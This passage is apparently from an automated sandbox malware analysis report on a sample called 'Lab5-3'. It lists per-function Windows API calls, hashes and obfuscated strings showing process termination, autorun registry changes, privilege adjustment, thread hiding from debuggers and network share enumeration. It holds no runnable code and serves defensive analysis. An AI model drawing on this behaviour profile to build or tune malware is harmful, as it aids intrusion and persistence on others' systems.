                                                                                                            • Opcode Fuzzy Hash: 9a1f285a984335b2c3b5d4fbb688acc05a71f72ae61a00471cef763623505b72
                                                                                                            • Instruction Fuzzy Hash: 2921F631E0021CEBDB219BA4AC4CBEFBBB8EB05715F104166EE14E2250D7784A84DBD9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 0041A469
                                                                                                            • malloc.MSVCRT ref: 0041A475
                                                                                                            • RtlInitializeSListHead.NTDLL ref: 0041A488
                                                                                                            • RtlInitializeCriticalSection.NTDLL ref: 0041A493
                                                                                                            • Sleep.KERNEL32(00003A98), ref: 0041A4A4
                                                                                                              • Part of subcall function 0041A130: malloc.MSVCRT ref: 0041A14B
                                                                                                              • Part of subcall function 0041A130: GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0041A168
                                                                                                              • Part of subcall function 0041A130: free.MSVCRT(00000000), ref: 0041A170
                                                                                                              • Part of subcall function 0041A130: malloc.MSVCRT ref: 0041A17C
                                                                                                              • Part of subcall function 0041A130: GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0041A193
                                                                                                              • Part of subcall function 0041A130: lstrcmpiA.KERNEL32(000001B0,?), ref: 0041A209
                                                                                                              • Part of subcall function 0041A130: PathRemoveExtensionA.SHLWAPI(?), ref: 0041A225
                                                                                                            • RtlInterlockedFlushSList.NTDLL ref: 0041A4BA
                                                                                                            • RtlDeleteCriticalSection.NTDLL(004283DC), ref: 0041A4C5
                                                                                                            • WSACleanup.WS2_32 ref: 0041A4CB
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00419BD0,00000000,00000000,?), ref: 0041A4F2
                                                                                                            • NtSetInformationThread.NTDLL ref: 0041A506
                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041A51A
                                                                                                            • RtlInterlockedFlushSList.NTDLL ref: 0041A534
                                                                                                            • RtlDeleteCriticalSection.NTDLL(004283DC), ref: 0041A53F
                                                                                                            • WSACleanup.WS2_32 ref: 0041A545
                                                                                                            • free.MSVCRT(?), ref: 0041A555
                                                                                                            • ExitThread.KERNEL32 ref: 0041A560
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalListSectionThreadmalloc$AdaptersCleanupDeleteFlushInfoInitializeInterlockedSleepfree$CreateExitExtensionHeadInformationPathRemoveStartuplstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2533719550-0
                                                                                                            • Opcode ID: deb318fb5bc1a939bb2f4c2839f6069ee70202c5b136f01af2b9c766f2d3f546
                                                                                                            • Instruction ID: bad515cce3d082cda0727216c2fa794b2487a1ef4ba217794ee3d9150f08fc11
                                                                                                            • Opcode Fuzzy Hash: deb318fb5bc1a939bb2f4c2839f6069ee70202c5b136f01af2b9c766f2d3f546
                                                                                                            • Instruction Fuzzy Hash: 3A218131342204ABE3206B74FC4EB9E3768EB48765F508136F911D51F0DFB894958AAE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: MLE$@JZ$@L]$AHMF$EL]L$F]Z]$F^Z$H\E]$JMLM$L]L$MD@G$PML$RMLO$TKF$ZAHM$ZL]$^JFY$_ZZH
                                                                                                            • API String ID: 0-1273737709
                                                                                                            • Opcode ID: afcf6790d98dbfe730b908e0847d753e8fc80e788caa6e22178c79fe61411995
                                                                                                            • Instruction ID: 94cd9da60fa10b11400329eaac0340e206136742f009362fcf51b2646d62d536
                                                                                                            • Opcode Fuzzy Hash: afcf6790d98dbfe730b908e0847d753e8fc80e788caa6e22178c79fe61411995
                                                                                                            • Instruction Fuzzy Hash: 79F1EF5014A3D09DD7028BB650557E23FB11B2B60DF3D61EED0E88E263C617C28BEB66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00416745
                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 00416760
                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000), ref: 00416770
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000001,?,?,00000000,00000000), ref: 00416788
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 00416797
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 0041679E
                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004167AB
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004167B6
                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,00000000), ref: 004167B8
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000001,?,?,00000000,00000000), ref: 004167CA
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,00000000,00000000), ref: 004167D9
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004167E2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseHandle$CurrentOpenProcess32Terminate$CreateFirstNextSnapshotToolhelp32
                                                                                                            • String ID: ;~A
                                                                                                            • API String ID: 3774302331-1729689117
                                                                                                            • Opcode ID: 1d03e9f39f2ef77b44af329925a3fe6d288d84525e4fe6b41f23d60ade6cd124
                                                                                                            • Instruction ID: 8d7da5227f3de543adb6aed03ce5231c5ae460c615805ddaa61a7346ca68f397
                                                                                                            • Opcode Fuzzy Hash: 1d03e9f39f2ef77b44af329925a3fe6d288d84525e4fe6b41f23d60ade6cd124
                                                                                                            • Instruction Fuzzy Hash: 15212B327002246BD7305B249C89BEFB77CEB48755F05417AF918E22C0DB748D8186E9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: #0'b$&b ;$',!0$'16-$,$-0$-,b1$.'1b$.'1l$/#6+$0'b+$0b$+$0b/-$6*#6$6:6b$;26'$b+1b$b;-7
                                                                                                            • API String ID: 0-4259548654
                                                                                                            • Opcode ID: f2cb9e9a02f8622508b59d79bdae631d806d2de9ffca58548dd3b74b5e9f7276
                                                                                                            • Instruction ID: 9ef72b189fde0a05c107d316738d036d4053ca5fbd519dea61faf169cada5691
                                                                                                            • Opcode Fuzzy Hash: f2cb9e9a02f8622508b59d79bdae631d806d2de9ffca58548dd3b74b5e9f7276
                                                                                                            • Instruction Fuzzy Hash: D5518BA004D3D0ADDB569FB551502A23FF06E3B64D73961DED0E44E263C227C287EB66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,>",$,Xd~$,m,X$,~io$=",H$Jc``$bhih$caai$cb,x$cykd$c{,x$c~,N$di,e$i~,!$yoxe$|mki
                                                                                                            • API String ID: 0-4186269088
                                                                                                            • Opcode ID: a251871678f81495f4f5e2c9a373e8798cdbc1d85725a00bddb656d1a457026b
                                                                                                            • Instruction ID: 6819e3938d9d9d3676ce1218cd362516acb3aff5a68345332644905b41ffbb13
                                                                                                            • Opcode Fuzzy Hash: a251871678f81495f4f5e2c9a373e8798cdbc1d85725a00bddb656d1a457026b
                                                                                                            • Instruction Fuzzy Hash: C812E15018E3D09CD7128BB650557E23FA11B2B64DF3D61EED0E44E2A3C157838BEB66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • wvsprintfA.USER32(?,00000000,?), ref: 0040F67C
                                                                                                            • wsprintfA.USER32 ref: 0040F6C5
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 0040F6CE
                                                                                                            • wsprintfA.USER32 ref: 0040F71B
                                                                                                            • RtlEnterCriticalSection.NTDLL(00426948), ref: 0040F73F
                                                                                                            • SetConsoleTextAttribute.KERNEL32(?,0000000A), ref: 0040F753
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 0040F785
                                                                                                            • SetConsoleTextAttribute.KERNEL32(?,0000000F), ref: 0040F78F
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 0040F7BF
                                                                                                            • GetConsoleWindow.KERNEL32 ref: 0040F7C1
                                                                                                            • IsWindowVisible.USER32(00000000), ref: 0040F7CA
                                                                                                            • FlashWindow.USER32(00000000,00000000), ref: 0040F7D7
                                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 0040F7E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleWindow$AttributeCriticalFileSectionTextWritewsprintf$EnterFlashLeaveLocalTimeVisiblewvsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3789499329-0
                                                                                                            • Opcode ID: 6db8ada49a6fa9376cc054bc43835bfaa8ad5e1859e7a84ecc238507b1d126a7
                                                                                                            • Instruction ID: 5060e21178234e9c7b3c93b993cc3f5c3e4078bb1df41f596c03d86633996232
                                                                                                            • Opcode Fuzzy Hash: 6db8ada49a6fa9376cc054bc43835bfaa8ad5e1859e7a84ecc238507b1d126a7
                                                                                                            • Instruction Fuzzy Hash: 63518171901258AFDB21DBA8DC44BEFBBB8AF09300F0444BAE545A7292D734A649CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,76F02B40,?,74DF0F10), ref: 00416B6E
                                                                                                            • RegDeleteValueW.ADVAPI32(?,00000000,?,?,?,74DF0F10), ref: 00416B9C
                                                                                                            • RegCloseKey.ADVAPI32(?,74DF0F10), ref: 00416BE0
                                                                                                            • wsprintfW.USER32 ref: 00416C67
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000104,?,?,74DF0F10), ref: 00416C87
                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?,74DF0F10), ref: 00416C9F
                                                                                                            • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000000,?,?,74DF0F10), ref: 00416CC1
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,74DF0F10), ref: 00416CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Value$Close$CreateDeleteQuerylstrcmpiwsprintf
                                                                                                            • String ID: :$Service %s stopped$k .2
                                                                                                            • API String ID: 209852802-1749210681
                                                                                                            • Opcode ID: 9fe9c7387c0b3288e357640dc3010516ba04db4c875bfdd08ff00c580d837061
                                                                                                            • Instruction ID: c6fd477cb62e55f445015106ad16b5e4325d6db81518b99a34504723aedb9ca7
                                                                                                            • Opcode Fuzzy Hash: 9fe9c7387c0b3288e357640dc3010516ba04db4c875bfdd08ff00c580d837061
                                                                                                            • Instruction Fuzzy Hash: F951C231A00208EBDB11DFA0DD48BEEBBB8EF09314F404066F545B7160EB759689CB98
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtCreateIoCompletion.NTDLL(00428228,001F0003,00000000,?), ref: 004193C7
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004180B0,00000000,00000000,?), ref: 00419442
                                                                                                            • NtSetInformationThread.NTDLL ref: 00419452
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004180B0,00000000,00000000,?), ref: 00419466
                                                                                                            • NtSetInformationThread.NTDLL ref: 00419476
                                                                                                            • NtSetInformationThread.NTDLL ref: 00419491
                                                                                                            • NtSetInformationThread.NTDLL ref: 0041949D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Thread$Information$Create$Completion
                                                                                                            • String ID: WWW$7901$u0;4
                                                                                                            • API String ID: 3001912770-3472882075
                                                                                                            • Opcode ID: ef9c73f595498e55178619ea4464278810a30ed18a29ea8d5bb05a3d1492ea97
                                                                                                            • Instruction ID: 9e1c17205e841a66c06d8fffb0230576b549e409abe5a581344e3a5dd371a1f9
                                                                                                            • Opcode Fuzzy Hash: ef9c73f595498e55178619ea4464278810a30ed18a29ea8d5bb05a3d1492ea97
                                                                                                            • Instruction Fuzzy Hash: 73512E70648340AAE310DF249C81BAFBBE4EF89714F40052EFA959A2D2D7B4D54AC75F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000013,00000000,0040FBE5), ref: 0040FC0F
                                                                                                            • malloc.MSVCRT ref: 0040FC23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumOpenmalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 223765245-0
                                                                                                            • Opcode ID: 09579c9e9cba52c6e72090797c35d3c232a892e90df762c94d0234afe7bcf3e2
                                                                                                            • Instruction ID: b06ed3647f58f50ca9b74a8b07a3737af7feba6fd09c6bc6392e86ca34e10b16
                                                                                                            • Opcode Fuzzy Hash: 09579c9e9cba52c6e72090797c35d3c232a892e90df762c94d0234afe7bcf3e2
                                                                                                            • Instruction Fuzzy Hash: 9641E570A40209ABEB309B60DC4ABAF7778FF05720F104276ED12A62D0D77459498B99
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(?,00000000,?), ref: 004129DD
                                                                                                            • CryptAcquireContextW.ADVAPI32(00000032,00000000,00000001,00000001,F0000000), ref: 004129FB
                                                                                                            • CryptGenRandom.ADVAPI32(00000032,642E7470,00006C6C), ref: 00412A0E
                                                                                                            • CryptReleaseContext.ADVAPI32(00000032,00000000), ref: 00412A1C
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00412A3A
                                                                                                            • CryptAcquireContextW.ADVAPI32(00000032,00000000,00000001,00000001,F0000000), ref: 00412A6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$Acquire$AddressLibraryLoadProcRandomRelease
                                                                                                            • String ID: bcry$pt.d
                                                                                                            • API String ID: 1691255365-3497837158
                                                                                                            • Opcode ID: 83d9abf2b0ec9711330afaab52501315e054c9892cdc4569466ecd92e9c808ff
                                                                                                            • Instruction ID: 3b119af7abe073dc8e536e59161ad5eccd177bddd3957992fc37f9f76aceeb4b
                                                                                                            • Opcode Fuzzy Hash: 83d9abf2b0ec9711330afaab52501315e054c9892cdc4569466ecd92e9c808ff
                                                                                                            • Instruction Fuzzy Hash: AA41087190020CEAEF10CFD0DD49BDEBFB9FF18745F108119E514AA261E7B65A98CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • wsprintfW.USER32 ref: 00416D17
                                                                                                            • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00416D2A
                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00416DFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExecuteFileMoveShellwsprintf
                                                                                                            • String ID: <$>$F$Removed autorun key$S
                                                                                                            • API String ID: 3421002583-812384200
                                                                                                            • Opcode ID: 5e71a743bc49030b7d2e673c69dcf19f7db90dad35eadb283a2afef5d8fe7582
                                                                                                            • Instruction ID: 4cee06e28628433ef3f28a2d162e63d1a5f098c3b67fbf08700f09a1b46886e2
                                                                                                            • Opcode Fuzzy Hash: 5e71a743bc49030b7d2e673c69dcf19f7db90dad35eadb283a2afef5d8fe7582
                                                                                                            • Instruction Fuzzy Hash: 61312F74A10249EBDB10DFE4C9047DEB7F5FF18304F40916AE404E72A0E7B89A45CB59
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtOpenProcessToken.NTDLL(000000FF,00000008,74DF3340), ref: 004127C2
                                                                                                            • malloc.MSVCRT ref: 004127CD
                                                                                                            • NtQueryInformationToken.NTDLL ref: 004127EB
                                                                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 004127FB
                                                                                                            • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,00000000,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 0041280C
                                                                                                            • SetFileSecurityW.ADVAPI32(?,00000001,?,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412823
                                                                                                            • SetFileSecurityW.ADVAPI32(74DF3530,00000004,?,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412832
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412846
                                                                                                            • free.MSVCRT(00000000,?,?,?,?,004199C4,?,74DF3530,00000001), ref: 00412851
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$DescriptorFileToken$CloseHandleInformationInitializeOpenOwnerProcessQueryfreemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 4059018608-0
                                                                                                            • Opcode ID: 15aa378bae738879ea2419c1c7e040c5f48cc7033844b89ff34418c674939ec5
                                                                                                            • Instruction ID: 4e88f05283761bd4f385d5fa76b939d32f67dda893b8ea24b93715774626ec73
                                                                                                            • Opcode Fuzzy Hash: 15aa378bae738879ea2419c1c7e040c5f48cc7033844b89ff34418c674939ec5
                                                                                                            • Instruction Fuzzy Hash: EC216271A00209ABEB209FA59D48FEF7BBCEF48710F044179F914E2290D7B8D954C7A8
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @GQF$EAW@$E]@Y$FZ[A$W?8?$[\AF$[]\A
                                                                                                            • API String ID: 0-1463417759
                                                                                                            • Opcode ID: 7be9d92d85640667a19779d323b54c049e5115ce0d816e1e90af7b9ac9207c23
                                                                                                            • Instruction ID: d10a77cca0dcdde939108beedbb4f8e3447b5d2df1305e1aa2297cc8962be298
                                                                                                            • Opcode Fuzzy Hash: 7be9d92d85640667a19779d323b54c049e5115ce0d816e1e90af7b9ac9207c23
                                                                                                            • Instruction Fuzzy Hash: FD03911018E3D0ACDB128AB510597E23FA11B3B64DF3D61EED0E85D1A3C557838BEB66
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • CommandLineToArgvW.SHELL32(?,?), ref: 0040FDD5
                                                                                                            • ExitProcess.KERNEL32 ref: 0040FDF9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ArgvCommandExitLineProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 615141403-0
                                                                                                            • Opcode ID: 7d7604ae8070afc0e257e2d3d1a0e3819deb64b21dbd7b187f673ec2e18fbaf3
                                                                                                            • Instruction ID: 32678c8bb9ba8561dcf39a414fc6963516d0944681ca6e103032348cfec98064
                                                                                                            • Opcode Fuzzy Hash: 7d7604ae8070afc0e257e2d3d1a0e3819deb64b21dbd7b187f673ec2e18fbaf3
                                                                                                            • Instruction Fuzzy Hash: FC219D31104301AFC720EF64D959A6A77A0FB44714F05093EF891A76F2EB34EC49CB9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • NtOpenProcessToken.NTDLL(000000FF,00000028,?), ref: 004125CE
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 004125FC
                                                                                                            • NtAdjustPrivilegesToken.NTDLL ref: 0041262B
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00412670
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.1822389450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.1822008276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822737121.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000013.00000002.1822809550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_Lab5-3.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
                                                                                                            • String ID: &<SW
                                                                                                            • API String ID: 3109822214-3992320458
